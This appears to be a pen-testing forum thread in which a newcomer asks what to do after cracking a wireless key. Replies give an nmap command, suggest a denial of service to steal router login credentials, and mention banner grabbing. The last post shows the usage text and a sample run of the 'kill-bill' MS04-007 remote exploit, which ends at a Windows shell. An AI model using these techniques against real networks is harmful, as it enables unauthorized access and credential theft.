Results 1 to 5 of 5

Thread: whats next......

  1. #1
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Question whats next......

    sorry for the new thread guys I almost feel like Im spamming the forums but im interested in what to do next after obtaining the wep/wpa key. I know a lot of people just want to steal their neighbors wireless or get free internet at a hotel but I am really Interested In pen testing and being new to linux I could use some help Im doing plenty of reasearch to but I was hopping some tutorials were comming about what to do next. For example how can i access a ap after i obtain the key. more importantly how can i connect by exploiting a port. my router is firewalled and passprotected and for some reason it is inaccesabile by wireless and it is by ethernet?dont know why . im interested now in wirelessly accessing ports to gain control off a net work. Just a nudge towards to right set of tools would help. Im just trying to get the most out of bt because only using it for wep crack seems like using a ferrari for a closet. thanks

  2. #2
    Member
    Join Date
    Jan 2007
    Posts
    242

    Default

    I would hope most of the people here are interested in more than ripping off their neighbor's wireless. I hope this is your own router you are trying to exploit. Possibly if you rephrase your question...

    nmap -v -A <router ip>

    The above command will show you what common ports are open on your router and possibly what kind of router it is.

    You could google for the type of router plus exploit.

    You could possibly create a denial of service and steal the login credentials with a **** attack when the owner logs in to see what's going on.

    Stealing your neighbor's bandwidth can have unexpected results. An email "from you" to everyone in your address book concerning your new sexual orientation comes to mind.

    Have Fun

  3. #3
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Talking

    Of course its my own router and I know how to use n-map. My router Is only open on 80 and 443 both http ports as far as i can figure. the problem is i cant access the login screen wire lessly but i can from one of the hardwired pcs on my net work. I guess im looking for the work around that. i.e connecting to a router port wirelessly {through a firewall} in order to access the net work. I realize this is a tall order but some help in the right direction would help..........such as im now reading up and studing metasploit but some of the types of exploits are way over my head. maby if you guys know another forum or site i have not yet visited. thanks,

  4. #4
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default

    Quote Originally Posted by purehate View Post
    Of course its my own router and I know how to use n-map. My router Is only open on 80 and 443 both http ports as far as i can figure. the problem is i cant access the login screen wire lessly but i can from one of the hardwired pcs on my net work. I guess im looking for the work around that. i.e connecting to a router port wirelessly {through a firewall} in order to access the net work. I realize this is a tall order but some help in the right direction would help..........such as im now reading up and studing metasploit but some of the types of exploits are way over my head. maby if you guys know another forum or site i have not yet visited. thanks,
    One vector of attack would be if someone connected to port 80, they could do a banner grab and find out what version of IIS/Apache you're running, and if it has any associated exploits.
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  5. #5
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Wink kill-bill

    $ ./kill-bill.pl
    . kill-bill : Microsoft ASN.1 remote exploit for CAN-2003-0818 (MS04-007)
    by Solar Eclipse <solareclipse@phreedom.org>

    Usage: kill-bill -p <port> -s <service> host

    Services:
    iis IIS HTTP server (port 80)
    iis-ssl IIS HTTP server with SSL (port 443)
    exchange Microsoft Exchange SMTP server (port 25)
    smb-nbt SMB over NetBIOS (port 139)
    smb SMB (port 445)

    If a service is running on its default port you don't have to
    specify both the service and the port.

    Examples: kill-bill -s iis 192.168.0.1
    kill-bill -p 80 192.168.0.1
    kill-bill -p 1234 -s smb 192.168.0.1

    $ ./kill-bill.pl -s smb 192.168.0.1
    . kill-bill : Microsoft ASN.1 remote exploit for CAN-2003-0818 (MS04-007)
    by Solar Eclipse <solareclipse@phreedom.org>

    . Loading shellcode
    . Generating SPNEGO token
    SPNEGO token is 4222 bytes long.
    . Exploiting SMB server at 192.168.0.1:445
    Sending Negotiate Protocol Request
    Sending Session Setup AndX request (4287) bytes
    . Attempting to connect to shell on port 8721

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:\WINNT\system32>


    this comes with some exploit instructions. any one know it?

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •